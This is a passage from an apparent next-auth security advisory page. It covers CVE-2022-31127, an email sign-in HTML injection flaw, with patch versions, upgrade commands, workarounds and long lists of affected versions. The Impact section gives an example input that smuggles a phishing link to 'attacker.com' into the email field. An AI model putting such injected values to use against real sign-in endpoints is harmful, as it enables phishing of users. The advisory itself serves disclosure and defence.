If you have any concerns, we request responsible disclosure, outlined here: https://next-auth.js.org/security#reporting-a-vulnerability

Timeline

The issue was reported 18th of July, a response was sent out in less than 20 minutes and after identifying the issue a patch was published within a week.

Affected versions: ["4.10.1", "4.10.0", "4.9.0", "4.8.0", "4.7.0", "4.6.1", "4.6.0", "4.5.0", "4.4.0", "4.3.4", "4.3.3", "4.3.2", "4.3.1", "4.3.0", "4.2.1", "4.2.0", "4.1.2", "4.1.1", "4.1.0", "4.1.0-next.2", "4.1.0-next.1", "4.0.6", "4.0.5", "4.0.4", "4.0.3", "4.0.2", "4.0.1", "4.0.0", "3.29.8", "3.29.7", "3.29.6", "3.29.5", "3.29.4", "3.29.3", "3.29.1", "3.29.0", "3.28.0", "3.27.3", "3.27.2", "3.27.1", "3.27.0", "3.26.1", "3.26.0", "3.25.0", "3.24.1", "3.24.0", "3.24.0-canary.0", "3.23.3", "3.23.2", "3.23.1", "3.23.0", "3.22.0", "3.22.0-canary.2", "3.22.0-canary.1", "3.22.0-canary.0", "3.21.1", "3.21.0", "3.20.1", "3.20.0", "3.20.0-canary.7", "3.20.0-canary.6", "3.20.0-canary.5", "3.20.0-canary.4", "3.20.0-canary.3", "3.20.0-canary.2", "3.20.0-canary.1", "3.20.0-canary.0", "3.19.8", "3.19.7", "3.19.6", "3.19.6-beta.0", "3.19.5", "3.19.5-beta.0", "3.19.4", "3.19.3", "3.19.2", "3.19.1", "3.19.0", "3.18.2", "3.18.1", "3.18.0", "3.18.0-canary.1", "3.18.0-canary.0", "3.17.2", "3.17.1", "3.17.0", "3.16.1", "3.16.0", "3.15.13", "3.15.12", "3.15.11", "3.15.10", "3.15.9", "3.15.8", "3.15.7", "3.15.6", "3.15.5", "3.15.4", "3.15.1", "3.15.0", "3.15.0-beta.4", "3.15.0-beta.3", "3.15.0-beta.2", "3.15.0-beta.1", "3.14.8", "3.14.7", "3.14.6", "3.14.5", "3.14.4", "3.14.3", "3.14.2", "3.14.1", "3.14.0", "3.14.0-beta.7", "3.14.0-beta.6", "3.14.0-beta.5", "3.14.0-beta.4", "3.14.0-beta.3", "3.14.0-beta.2", "3.14.0-beta.1", "3.14.0-canary.7", "3.14.0-canary.6", "3.14.0-canary.5", "3.14.0-canary.4", "3.14.0-canary.3", "3.14.0-canary.2", "3.14.0-canary.1", "3.14.0-canary.0", "3.13.3", "3.13.2", "3.13.1", "3.13.0", "3.12.0", "3.11.2", "3.11.1", "3.11.0", "3.10.1", "3.10.0", "3.9.0", "3.8.0", "3.7.1", "3.7.0", "3.6.1", "3.6.0", "3.5.1", "3.5.0", "3.4.2", "3.4.1", "3.4.0", "3.3.1", "3.3.0", "3.3.0-canary.11", "3.3.0-canary.10", "3.3.0-canary.9", "3.3.0-canary.8", "3.3.0-canary.7", "3.3.0-canary.6", "3.3.0-canary.5", "3.3.0-canary.4", "3.3.0-canary.3", "3.3.0-canary.2", "3.3.0-canary.1", "3.2.1", "3.2.0", "3.2.0-canary.43", "3.2.0-canary.42", "3.2.0-canary.41", "3.2.0-canary.40", "3.2.0-canary.39", "3.2.0-canary.38", "3.2.0-canary.37", "3.2.0-canary.36", "3.2.0-canary.35", "3.2.0-canary.34", "3.2.0-canary.33", "3.2.0-canary.32", "3.2.0-canary.31", "3.2.0-canary.30", "3.2.0-canary.29", "3.2.0-canary.28", "3.2.0-canary.27", "3.2.0-canary.26", "3.2.0-canary.25", "3.2.0-canary.24", "3.2.0-canary.23", "3.2.0-canary.22", "3.2.0-canary.21", "3.2.0-canary.20", "3.2.0-canary.19", "3.2.0-canary.18", "3.2.0-canary.17", "3.2.0-canary.16", "3.2.0-canary.15", "3.2.0-canary.14", "3.2.0-canary.13", "3.2.0-canary.12", "3.2.0-canary.11", "3.2.0-canary.10", "3.2.0-canary.9", "3.2.0-canary.8", "3.2.0-canary.7", "3.2.0-canary.6", "3.2.0-canary.5", "3.2.0-canary.4", "3.2.0-canary.3", "3.2.0-canary.2", "3.2.0-canary.1", "3.1.0", "3.0.1", "3.0.0", "3.0.0-beta.26", "3.0.0-beta.25", "3.0.0-beta.24", "3.0.0-beta.23", "3.0.0-beta.22", "3.0.0-beta.21", "3.0.0-beta.20", "3.0.0-beta.19", "3.0.0-beta.18", "3.0.0-beta.17", "3.0.0-beta.16", "3.0.0-beta.15", "3.0.0-beta.14", "3.0.0-beta.13", "3.0.0-beta.12", "3.0.0-beta.11", "3.0.0-beta.10", "3.0.0-beta.9", "3.0.0-beta.8", "3.0.0-beta.7", "3.0.0-beta.6", "3.0.0-beta.5", "3.0.0-beta.4", "3.0.0-beta.3", "3.0.0-beta.2", "3.0.0-beta.1", "3.0.0-beta.0", "2.2.1-beta.0", "2.2.0", "2.2.0-beta.0", "2.1.0", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.1", "2.0.0", "2.0.0-beta.86", "2.0.0-beta.85", "2.0.0-beta.84", "2.0.0-beta.83", "2.0.0-beta.82", "2.0.0-beta.81", "2.0.0-beta.80", "2.0.0-beta.79", "2.0.0-beta.78", "2.0.0-beta.77", "2.0.0-beta.76", "2.0.0-beta.75", "2.0.0-beta.74", "2.0.0-beta.73", "2.0.0-beta.72", "2.0.0-beta.71", "2.0.0-beta.70", "2.0.0-beta.69", "2.0.0-beta.68", "2.0.0-beta.67", "2.0.0-beta.66", "2.0.0-beta.65", "2.0.0-beta.64", "2.0.0-beta.63", "2.0.0-beta.62", "2.0.0-beta.61", "2.0.0-beta.60", "2.0.0-beta.59", "2.0.0-beta.58", "2.0.0-beta.57", "2.0.0-beta.56", "2.0.0-beta.55", "2.0.0-beta.54", "2.0.0-beta.53", "2.0.0-beta.52", "2.0.0-beta.51", "2.0.0-beta.50", "2.0.0-beta.49", "2.0.0-beta.48", "2.0.0-beta.47", "2.0.0-beta.46", "2.0.0-beta.45", "2.0.0-beta.44", "2.0.0-beta.43", "2.0.0-beta.42", "2.0.0-beta.41", "2.0.0-beta.40", "2.0.0-beta.39", "2.0.0-beta.38", "2.0.0-beta.37", "2.0.0-beta.35", "2.0.0-beta.34", "2.0.0-beta.33", "2.0.0-beta.32", "2.0.0-beta.31", "2.0.0-beta.30", "2.0.0-beta.29", "2.0.0-beta.28", "2.0.0-beta.27", "2.0.0-beta.26", "2.0.0-beta.25", "2.0.0-beta.24", "2.0.0-beta.23", "2.0.0-beta.22", "2.0.0-beta.21", "2.0.0-beta.20", "2.0.0-beta.19", "2.0.0-beta.18", "2.0.0-beta.17", "2.0.0-beta.16", "2.0.0-beta.15", "2.0.0-beta.14", "2.0.0-beta.13", "2.0.0-beta.12", "2.0.0-beta.11", "2.0.0-beta.10", "2.0.0-beta.9", "2.0.0-beta.8", "2.0.0-beta.7", "2.0.0-beta.6", "2.0.0-beta.5", "2.0.0-beta.4", "2.0.0-beta.3", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.12.1", "1.12.0", "1.11.0", "1.10.0", "1.9.1", "1.9.0", "1.8.5", "1.8.4", "1.8.3", "1.8.2", "1.8.1", "1.8.0", "1.7.3", "1.7.2", "1.7.1", "1.7.0", "1.6.0", "1.5.1", "1.5.0", "1.4.1", "1.4.0", "1.3.0", "1.2.1", "1.1.10", "1.1.9", "1.1.8", "1.1.7", "1.1.6", "1.1.5", "1.1.3", "1.1.2", "1.1.1", "1.1.0", "1.0.0", "0.0.0-pr.3101.63594048", "0.0.0-pr.3222.41318883", "0.0.0-pr.2683.26718028", "0.0.0-manual.20446898", "0.0.0-pr.6777.16422804", "0.0.0-pr.6777.c5550344", "0.0.0-pr.1698.f3995462", "0.0.0-pr.2875.e2663860", "0.0.0-pr.3143.b2273741", "0.0.0-pr.5657.4f991076", "0.0.0-pr.2857.9c439830", "0.0.0-manual.d0952342", "0.0.0-pr.2552.dd337147", "0.0.0-pr.2552.58d56122", "0.0.0-pr.2361.f72c6565", "0.0.0-pr.3657.c2de6348", "0.0.0-pr.2829.f0df4332", "0.0.0-pr.2214.ec1f3808", "0.0.0-pr.2857.8950d346", "0.0.0-pr.2552.ec27f344", "0.0.0-pr.2857.179d0314", "0.0.0-pr.3101.01cf0d98", "0.0.0-pr.2552.4d03c090", "0.0.0-pr.7056.f991df89", "0.0.0-pr.3143.367c8e88", "0.0.0-pr.2325.c9308d84", "0.0.0-pr.2361.f3784c70", "0.0.0-pr.5442.f1124f60", "0.0.0-pr.2884.7d74de57", "0.0.0-pr.2552.8de94d45", "0.0.0-pr.7056.1fefd037", "0.0.0-pr.2552.31684d31", "0.0.0-pr.5000.d742df31", "0.0.0-pr.2862.59712c27", "0.0.0-pr.3140.e6839f23", "0.0.0-pr.11562.ed0fce23", "0.0.0-pr.2518.f6892e15", "0.0.0-pr.2842.ccf36f15", "0.0.0-pr.3142.7d257c15", "0.0.0-pr.3307.e9e46c15", "0.0.0-pr.3657.56c042d8", "0.0.0-pr.3657.1ce622f7", "0.0.0-pr.6777.7f1745f6", "0.0.0-pr.2857.c98979e5", "0.0.0-pr.2932.3e8c32f4", "0.0.0-pr.3832.0245f6c4", "0.0.0-pr.4769.fc4d07d3", "0.0.0-pr.2900.3f27f1d2", "0.0.0-pr.3101.14f215f1", "0.0.0-pr.3657.433167c1", "0.0.0-pr.2214.f5461d1f", "0.0.0-pr.2236.76c76f8c", "0.0.0-pr.1698.d16e2ddc", "0.0.0-pr.2388.ce5443cf", "0.0.0-pr.2361.34ee1e9e", "0.0.0-pr.2552.01dc565f", "0.0.0-pr.2682.198c077f", "0.0.0-pr.2829.6e10635e", "0.0.0-pr.2857.8c54020d", "0.0.0-pr.2932.50df98dc", "0.0.0-pr.3101.54efdeff", "0.0.0-pr.3101.52507ff0", "0.0.0-pr.2875.e07f9f4e", "0.0.0-pr.3657.e822786c", "0.0.0-pr.5442.d62475d0", "0.0.0-pr.4769.4d126ded", "0.0.0-pr.5745.7387139f", "0.0.0-pr.4769.e8de64ec", "0.0.0-pr.5984.0593f75c", "0.0.0-pr.5991.5c72424c", "0.0.0-pr.6132.47cee00f", "0.0.0-pr.7214.4142955d", "0.0.0-pr.4760.0b190842", "0.0.0-pr.3886.65b88464", "0.0.0-pr.3101.5bf71011", "0.0.0-pr.4769.3ba67573", "0.0.0-pr.5792.6b041161", "0.0.0-pr.5802.b9d39079", "0.0.0-pr.4757.5ac99859", "0.0.0-pr.2552.f3ab7686", "0.0.0-pr.2552.90b06885", "0.0.0-pr.4760.bd6c5394", "0.0.0-pr.2361.bb96a914", "0.0.0-pr.4970.bffda880", "0.0.0-pr.3101.a0a0b745", "0.0.0-pr.5753.2b78e705", "0.0.0-pr.2361.b6d0d634", "0.0.0-pr.3402.be5db520", "0.0.0-pr.2388.9cbca279", "0.0.0-pr.2848.76fbc129", "0.0.0-pr.4841.8befe102", "0.0.0-pr.2295.231aeb99", "0.0.0-pr.2942.6db13e97", "0.0.0-manual.5749b095", "0.0.0-pr.4760.d7288b88", "0.0.0-pr.5536.126b3a88", "0.0.0-manual.d211b087", "0.0.0-manual.b7162c86", "0.0.0-pr.2236.a8bf7d85", "0.0.0-pr.2552.d1b14b85", "0.0.0-pr.4769.07ba2c72", "0.0.0-pr.3648.05a6bc62", "0.0.0-manual.c8300b61", "0.0.0-pr.2552.86b46d57", "0.0.0-pr.3402.5fb1fb51", "0.0.0-pr.2857.7b3cd038", "0.0.0-pr.2767.f9d46b34", "0.0.0-pr.3141.0a0bc030", "0.0.0-pr.2552.07b5be17", "0.0.0-pr.2682.10a4ba14", "0.0.0-pr.2980.c0b78cd9", "0.0.0-manual.722c34b9", "0.0.0-pr.1698.708f4bf8", "0.0.0-pr.2857.acc78bf8", "0.0.0-pr.3101.fb56f6e8", "0.0.0-pr.3101.8ff8bdb8", "0.0.0-manual.f2c23db8", "0.0.0-pr.2552.27134bf7", "0.0.0-pr.3657.4e42b8a7", "0.0.0-pr.7056.ced446b7", "0.0.0-manual.cfb42ae7", "0.0.0-pr.2552.cf147fb6", "0.0.0-pr.7056.c0e491b6", "0.0.0-manual.024ba3e6", "0.0.0-pr.3514.ebb48bc5", "0.0.0-pr.4769.4bfe67f4", "0.0.0-pr.2411.0f8b51b3", "0.0.0-manual.83c4ebd1", "0.0.0-pr.2361.beca4a3f", "0.0.0-pr.2361.ee80cbbc", "0.0.0-pr.2518.7bdfc7da", "0.0.0-pr.2552.ab7a548e", "0.0.0-pr.2552.691ac07b", "0.0.0-pr.2295.bb8bb1ad", "0.0.0-pr.2682.bb1972ba", "0.0.0-pr.2717.06130bef", "0.0.0-pr.2821.192d7c9b", "0.0.0-pr.2717.029b91cf", "0.0.0-pr.2857.b44ca26c", "0.0.0-pr.2857.3b0351cb", "0.0.0-pr.3188.f68451bc", "0.0.0-pr.3188.74bc611f", "0.0.0-pr.3101.f2dcbb5b", "0.0.0-pr.3402.16a9ebfc", "0.0.0-pr.3415.e9590dcb", "0.0.0-pr.3446.476d780b", "0.0.0-pr.3648.44003b1e", "0.0.0-pr.3657.4157bfde", "0.0.0-pr.3657.ce9386bb", "0.0.0-pr.3783.db8ceb0d", "0.0.0-pr.3657.d29a61eb", "0.0.0-pr.3657.ab442e4d", "0.0.0-pr.3799.b9241d4a", "0.0.0-pr.3804.dba9889e", "0.0.0-pr.4941.b97ce6de", "0.0.0-pr.5000.d16b25dc", "0.0.0-pr.5000.adbbf3df", "0.0.0-pr.5745.db70f12d", "0.0.0-pr.6007.2e864d9b", "0.0.0-pr.6004.b96e4fbf", "0.0.0-pr.7056.1fdbd15f", "0.0.0-manual.b53ca00b", "0.0.0-manual.27bcf0fe", "0.0.0-manual.4c69001b", "0.0.0-manual.dacbe24d", "0.0.0-pr.3217.87a21677", "0.0.0-manual.ffd05533", "0.0.0-pr.2552.4a2d5099", "0.0.0-pr.4704.768a1433", "0.0.0-pr.4774.a31ef368", "0.0.0-pr.2411.8ca1f299", "0.0.0-pr.3649.27d8aa99", "0.0.0-pr.3657.642da092", "0.0.0-pr.1698.16a0ea86", "0.0.0-manual.7f41a086", "0.0.0-pr.2361.2f293a83", "0.0.0-pr.3101.a410dc81", "0.0.0-pr.3307.80f2af80", "0.0.0-pr.5792.9119ea67", "0.0.0-pr.7056.4708af34", "0.0.0-pr.2236.34ce1a28", "0.0.0-pr.3657.f1addc18", "0.0.0-manual.2824fa11", "0.0.0-pr.4769.0a576d10", "0.0.0-pr.5442.0c96da09", "0.0.0-pr.2552.7af698f7", "0.0.0-pr.2552.735c10a7", "0.0.0-pr.2875.6dc651a7", "0.0.0-pr.3784.6c986ac7", "0.0.0-pr.3101.7983f7a6", "0.0.0-pr.3648.f1ad5ec6", "0.0.0-pr.5556.ac098ce6", "0.0.0-pr.2361.d70a43d5", "0.0.0-pr.2552.f73a37a5", "0.0.0-pr.4769.e7e82aa5", "0.0.0-manual.4cd21ea5", "0.0.0-manual.f414f2f5", "0.0.0-pr.5000.fa94eef4", "0.0.0-pr.2214.a71ac3f3", "0.0.0-pr.2361.46a85ea3", "0.0.0-pr.2256.d61437a2", "0.0.0-pr.3886.93a266e2", "0.0.0-semantically-released", "0.0.0-pr.2214.e085efae", "0.0.0-pr.2236.e9a1675e", "0.0.0-pr.2361.a780908a", "0.0.0-pr.2552.d227a1aa", "0.0.0-pr.2552.af41912d", "0.0.0-pr.2857.9a95448e", "0.0.0-pr.2857.5225a3ef", "0.0.0-pr.2857.5130374a", "0.0.0-pr.3100.1ae9acd0", "0.0.0-pr.3101.3d58a27e", "0.0.0-pr.3288.14260eda", "0.0.0-pr.4003.e7e3e60a", "0.0.0-pr.4760.fa6189ff", "0.0.0-pr.4940.437d4e8a", "0.0.0-pr.4926.25a4fa9f", "0.0.0-pr.4970.6ae1561c", "0.0.0-pr.5763.5e81d58a", "0.0.0-pr.6004.7d354a3a", "0.0.0-pr.6007.27c9acfe", "0.0.0-pr.6029.8f267aea", "0.0.0-pr.6777.faa4ea2a", "0.0.0-pr.6777.ae645ec0", "0.0.0-pr.7214.998286da", "0.0.0-manual.e65faa1c", "0.0.0-manual.68f7ce1c", "0.0.0-manual.c885ac1d", "0.0.0-pr.8775.a98a849e", "0.0.0-manual.7264de5f"]
Secure versions: [4.24.12, 4.24.13, 5.0.0-beta.30]
Recommendation: Update to version 4.24.13.

Improper handling of email input

Published date: 2022-07-06T19:27:45Z
CVE: CVE-2022-31127
Links:

Impact

An attacker can pass a compromised input to the e-mail signin endpoint that contains some malicious HTML, tricking the e-mail server to send it to the user, so they can perform a phishing attack. Eg.: balazs@email.com, <a href="http://attacker.com">Before signing in, claim your money!</a>. This was previously sent to balazs@email.com, and the content of the email containing a link to the attacker's site was rendered in the HTML. This has been remedied in the following releases, by simply not rendering that e-mail in the HTML, since it should be obvious to the receiver what e-mail they used:

next-auth v3 users before version 3.29.8 are impacted. (We recommend upgrading to v4, as v3 is considered unmaintained. See our migration guide)

next-auth v4 users before version 4.8.0 are impacted.

Patches

We've released patches for this vulnerability in:

  • v3 - 3.29.8
  • v4 - 4.9.0

You can do:

npm i next-auth@latest
# or
yarn add next-auth@latest
#
pnpm add next-auth@latest

(This will update to the latest v4 version, but you can change latest to 3 if you want to stay on v3. This is not recommended.)

Workarounds

If for some reason you cannot upgrade, the workaround requires you to sanitize the email parameter that is passed to sendVerificationRequest and rendered in the HTML. If you haven't created a custom sendVerificationRequest, you only need to upgrade. Otherwise, make sure to either exclude email from the HTML body or efficiently sanitize it. Check out https://next-auth.js.org/providers/email#customizing-emails

References

Related documentation:

A test case has been added so this kind of issue will be checked before publishing. See: https://github.com/nextauthjs/next-auth/blob/cd6ccfde898037290ae949d500ace8a378376cd8/packages/next-auth/tests/email.test.ts

For more information

If you have any concerns, we request responsible disclosure, outlined here: https://next-auth.js.org/security#reporting-a-vulnerability

Timeline

The issue was reported 2022 June 29th, a response was sent out to the reporter in less than 1 hour, and after identifying the issue a patch was published within 4 working days.

Affected versions: ["4.8.0", "4.7.0", "4.6.1", "4.6.0", "4.5.0", "4.4.0", "4.3.4", "4.3.3", "4.3.2", "4.3.1", "4.3.0", "4.2.1", "4.2.0", "4.1.2", "4.1.1", "4.1.0", "4.1.0-next.2", "4.1.0-next.1", "4.0.6", "4.0.5", "4.0.4", "4.0.3", "4.0.2", "4.0.1", "4.0.0", "3.29.7", "3.29.6", "3.29.5", "3.29.4", "3.29.3", "3.29.1", "3.29.0", "3.28.0", "3.27.3", "3.27.2", "3.27.1", "3.27.0", "3.26.1", "3.26.0", "3.25.0", "3.24.1", "3.24.0", "3.24.0-canary.0", "3.23.3", "3.23.2", "3.23.1", "3.23.0", "3.22.0", "3.22.0-canary.2", "3.22.0-canary.1", "3.22.0-canary.0", "3.21.1", "3.21.0", "3.20.1", "3.20.0", "3.20.0-canary.7", "3.20.0-canary.6", "3.20.0-canary.5", "3.20.0-canary.4", "3.20.0-canary.3", "3.20.0-canary.2", "3.20.0-canary.1", "3.20.0-canary.0", "3.19.8", "3.19.7", "3.19.6", "3.19.6-beta.0", "3.19.5", "3.19.5-beta.0", "3.19.4", "3.19.3", "3.19.2", "3.19.1", "3.19.0", "3.18.2", "3.18.1", "3.18.0", "3.18.0-canary.1", "3.18.0-canary.0", "3.17.2", "3.17.1", "3.17.0", "3.16.1", "3.16.0", "3.15.13", "3.15.12", "3.15.11", "3.15.10", "3.15.9", "3.15.8", "3.15.7", "3.15.6", "3.15.5", "3.15.4", "3.15.1", "3.15.0", "3.15.0-beta.4", "3.15.0-beta.3", "3.15.0-beta.2", "3.15.0-beta.1", "3.14.8", "3.14.7", "3.14.6", "3.14.5", "3.14.4", "3.14.3", "3.14.2", "3.14.1", "3.14.0", "3.14.0-beta.7", "3.14.0-beta.6", "3.14.0-beta.5", "3.14.0-beta.4", "3.14.0-beta.3", "3.14.0-beta.2", "3.14.0-beta.1", "3.14.0-canary.7", "3.14.0-canary.6", "3.14.0-canary.5", "3.14.0-canary.4", "3.14.0-canary.3", "3.14.0-canary.2", "3.14.0-canary.1", "3.14.0-canary.0", "3.13.3", "3.13.2", "3.13.1", "3.13.0", "3.12.0", "3.11.2", "3.11.1", "3.11.0", "3.10.1", "3.10.0", "3.9.0", "3.8.0", "3.7.1", "3.7.0", "3.6.1", "3.6.0", "3.5.1", "3.5.0", "3.4.2", "3.4.1", "3.4.0", "3.3.1", "3.3.0", "3.3.0-canary.11", "3.3.0-canary.10", "3.3.0-canary.9", "3.3.0-canary.8", "3.3.0-canary.7", "3.3.0-canary.6", "3.3.0-canary.5", "3.3.0-canary.4", "3.3.0-canary.3", "3.3.0-canary.2", "3.3.0-canary.1", "3.2.1", "3.2.0", "3.2.0-canary.43", "3.2.0-canary.42", "3.2.0-canary.41", "3.2.0-canary.40", "3.2.0-canary.39", "3.2.0-canary.38", "3.2.0-canary.37", "3.2.0-canary.36", "3.2.0-canary.35", "3.2.0-canary.34", "3.2.0-canary.33", "3.2.0-canary.32", "3.2.0-canary.31", "3.2.0-canary.30", "3.2.0-canary.29", "3.2.0-canary.28", "3.2.0-canary.27", "3.2.0-canary.26", "3.2.0-canary.25", "3.2.0-canary.24", "3.2.0-canary.23", "3.2.0-canary.22", "3.2.0-canary.21", "3.2.0-canary.20", "3.2.0-canary.19", "3.2.0-canary.18", "3.2.0-canary.17", "3.2.0-canary.16", "3.2.0-canary.15", "3.2.0-canary.14", "3.2.0-canary.13", "3.2.0-canary.12", "3.2.0-canary.11", "3.2.0-canary.10", "3.2.0-canary.9", "3.2.0-canary.8", "3.2.0-canary.7", "3.2.0-canary.6", "3.2.0-canary.5", "3.2.0-canary.4", "3.2.0-canary.3", "3.2.0-canary.2", "3.2.0-canary.1", "3.1.0", "3.0.1", "3.0.0", "3.0.0-beta.26", "3.0.0-beta.25", "3.0.0-beta.24", "3.0.0-beta.23", "3.0.0-beta.22", "3.0.0-beta.21", "3.0.0-beta.20", "3.0.0-beta.19", "3.0.0-beta.18", "3.0.0-beta.17", "3.0.0-beta.16", "3.0.0-beta.15", "3.0.0-beta.14", "3.0.0-beta.13", "3.0.0-beta.12", "3.0.0-beta.11", "3.0.0-beta.10", "3.0.0-beta.9", "3.0.0-beta.8", "3.0.0-beta.7", "3.0.0-beta.6", "3.0.0-beta.5", "3.0.0-beta.4", "3.0.0-beta.3", "3.0.0-beta.2", "3.0.0-beta.1", "3.0.0-beta.0", "2.2.1-beta.0", "2.2.0", "2.2.0-beta.0", "2.1.0", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.1", "2.0.0", "2.0.0-beta.86", "2.0.0-beta.85", "2.0.0-beta.84", "2.0.0-beta.83", "2.0.0-beta.82", "2.0.0-beta.81", "2.0.0-beta.80", "2.0.0-beta.79", "2.0.0-beta.78", "2.0.0-beta.77", "2.0.0-beta.76", "2.0.0-beta.75", "2.0.0-beta.74", "2.0.0-beta.73", "2.0.0-beta.72", "2.0.0-beta.71", "2.0.0-beta.70", "2.0.0-beta.69", "2.0.0-beta.68", "2.0.0-beta.67", "2.0.0-beta.66", "2.0.0-beta.65", "2.0.0-beta.64", "2.0.0-beta.63", "2.0.0-beta.62", "2.0.0-beta.61", "2.0.0-beta.60", "2.0.0-beta.59", "2.0.0-beta.58", "2.0.0-beta.57", "2.0.0-beta.56", "2.0.0-beta.55", "2.0.0-beta.54", "2.0.0-beta.53", "2.0.0-beta.52", "2.0.0-beta.51", "2.0.0-beta.50", "2.0.0-beta.49", "2.0.0-beta.48", "2.0.0-beta.47", "2.0.0-beta.46", "2.0.0-beta.45", "2.0.0-beta.44", "2.0.0-beta.43", "2.0.0-beta.42", "2.0.0-beta.41", "2.0.0-beta.40", "2.0.0-beta.39", "2.0.0-beta.38", "2.0.0-beta.37", "2.0.0-beta.35", "2.0.0-beta.34", "2.0.0-beta.33", "2.0.0-beta.32", "2.0.0-beta.31", "2.0.0-beta.30", "2.0.0-beta.29", "2.0.0-beta.28", "2.0.0-beta.27", "2.0.0-beta.26", "2.0.0-beta.25", "2.0.0-beta.24", "2.0.0-beta.23", "2.0.0-beta.22", "2.0.0-beta.21", "2.0.0-beta.20", "2.0.0-beta.19", "2.0.0-beta.18", "2.0.0-beta.17", "2.0.0-beta.16", "2.0.0-beta.15", "2.0.0-beta.14", "2.0.0-beta.13", "2.0.0-beta.12", "2.0.0-beta.11", "2.0.0-beta.10", "2.0.0-beta.9", "2.0.0-beta.8", "2.0.0-beta.7", "2.0.0-beta.6", "2.0.0-beta.5", "2.0.0-beta.4", "2.0.0-beta.3", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.12.1", "1.12.0", "1.11.0", "1.10.0", "1.9.1", "1.9.0", "1.8.5", "1.8.4", "1.8.3", "1.8.2", "1.8.1", "1.8.0", "1.7.3", "1.7.2", "1.7.1", "1.7.0", "1.6.0", "1.5.1", "1.5.0", "1.4.1", "1.4.0", "1.3.0", "1.2.1", "1.1.10", "1.1.9", "1.1.8", "1.1.7", "1.1.6", "1.1.5", "1.1.3", "1.1.2", "1.1.1", "1.1.0", "1.0.0", "0.0.0-pr.3101.63594048", "0.0.0-pr.3222.41318883", "0.0.0-pr.2683.26718028", "0.0.0-manual.20446898", "0.0.0-pr.6777.16422804", "0.0.0-pr.6777.c5550344", "0.0.0-pr.1698.f3995462", "0.0.0-pr.2875.e2663860", "0.0.0-pr.3143.b2273741", "0.0.0-pr.5657.4f991076", "0.0.0-pr.2857.9c439830", "0.0.0-manual.d0952342", "0.0.0-pr.2552.dd337147", "0.0.0-pr.2552.58d56122", "0.0.0-pr.2361.f72c6565", "0.0.0-pr.3657.c2de6348", "0.0.0-pr.2829.f0df4332", "0.0.0-pr.2214.ec1f3808", "0.0.0-pr.2857.8950d346", "0.0.0-pr.2552.ec27f344", "0.0.0-pr.2857.179d0314", "0.0.0-pr.3101.01cf0d98", "0.0.0-pr.2552.4d03c090", "0.0.0-pr.7056.f991df89", "0.0.0-pr.3143.367c8e88", "0.0.0-pr.2325.c9308d84", "0.0.0-pr.2361.f3784c70", "0.0.0-pr.5442.f1124f60", "0.0.0-pr.2884.7d74de57", "0.0.0-pr.2552.8de94d45", "0.0.0-pr.7056.1fefd037", "0.0.0-pr.2552.31684d31", "0.0.0-pr.5000.d742df31", "0.0.0-pr.2862.59712c27", "0.0.0-pr.3140.e6839f23", "0.0.0-pr.11562.ed0fce23", "0.0.0-pr.2518.f6892e15", "0.0.0-pr.2842.ccf36f15", "0.0.0-pr.3142.7d257c15", "0.0.0-pr.3307.e9e46c15", "0.0.0-pr.3657.56c042d8", "0.0.0-pr.3657.1ce622f7", "0.0.0-pr.6777.7f1745f6", "0.0.0-pr.2857.c98979e5", "0.0.0-pr.2932.3e8c32f4", "0.0.0-pr.3832.0245f6c4", "0.0.0-pr.4769.fc4d07d3", "0.0.0-pr.2900.3f27f1d2", "0.0.0-pr.3101.14f215f1", "0.0.0-pr.3657.433167c1", "0.0.0-pr.2214.f5461d1f", "0.0.0-pr.2236.76c76f8c", "0.0.0-pr.1698.d16e2ddc", "0.0.0-pr.2388.ce5443cf", "0.0.0-pr.2361.34ee1e9e", "0.0.0-pr.2552.01dc565f", "0.0.0-pr.2682.198c077f", "0.0.0-pr.2829.6e10635e", "0.0.0-pr.2857.8c54020d", "0.0.0-pr.2932.50df98dc", "0.0.0-pr.3101.54efdeff", "0.0.0-pr.3101.52507ff0", "0.0.0-pr.2875.e07f9f4e", "0.0.0-pr.3657.e822786c", "0.0.0-pr.5442.d62475d0", "0.0.0-pr.4769.4d126ded", "0.0.0-pr.5745.7387139f", "0.0.0-pr.4769.e8de64ec", "0.0.0-pr.5984.0593f75c", "0.0.0-pr.5991.5c72424c", "0.0.0-pr.6132.47cee00f", "0.0.0-pr.7214.4142955d", "0.0.0-pr.4760.0b190842", "0.0.0-pr.3886.65b88464", "0.0.0-pr.3101.5bf71011", "0.0.0-pr.4769.3ba67573", "0.0.0-pr.5792.6b041161", "0.0.0-pr.5802.b9d39079", "0.0.0-pr.4757.5ac99859", "0.0.0-pr.2552.f3ab7686", "0.0.0-pr.2552.90b06885", "0.0.0-pr.4760.bd6c5394", "0.0.0-pr.2361.bb96a914", "0.0.0-pr.4970.bffda880", "0.0.0-pr.3101.a0a0b745", "0.0.0-pr.5753.2b78e705", "0.0.0-pr.2361.b6d0d634", "0.0.0-pr.3402.be5db520", "0.0.0-pr.2388.9cbca279", "0.0.0-pr.2848.76fbc129", "0.0.0-pr.4841.8befe102", "0.0.0-pr.2295.231aeb99", "0.0.0-pr.2942.6db13e97", "0.0.0-manual.5749b095", "0.0.0-pr.4760.d7288b88", "0.0.0-pr.5536.126b3a88", "0.0.0-manual.d211b087", "0.0.0-manual.b7162c86", "0.0.0-pr.2236.a8bf7d85", "0.0.0-pr.2552.d1b14b85", "0.0.0-pr.4769.07ba2c72", "0.0.0-pr.3648.05a6bc62", "0.0.0-manual.c8300b61", "0.0.0-pr.2552.86b46d57", "0.0.0-pr.3402.5fb1fb51", "0.0.0-pr.2857.7b3cd038", "0.0.0-pr.2767.f9d46b34", "0.0.0-pr.3141.0a0bc030", "0.0.0-pr.2552.07b5be17", "0.0.0-pr.2682.10a4ba14", "0.0.0-pr.2980.c0b78cd9", "0.0.0-manual.722c34b9", "0.0.0-pr.1698.708f4bf8", "0.0.0-pr.2857.acc78bf8", "0.0.0-pr.3101.fb56f6e8", "0.0.0-pr.3101.8ff8bdb8", "0.0.0-manual.f2c23db8", "0.0.0-pr.2552.27134bf7", "0.0.0-pr.3657.4e42b8a7", "0.0.0-pr.7056.ced446b7", "0.0.0-manual.cfb42ae7", "0.0.0-pr.2552.cf147fb6", "0.0.0-pr.7056.c0e491b6", "0.0.0-manual.024ba3e6", "0.0.0-pr.3514.ebb48bc5", "0.0.0-pr.4769.4bfe67f4", "0.0.0-pr.2411.0f8b51b3", "0.0.0-manual.83c4ebd1", "0.0.0-pr.2361.beca4a3f", 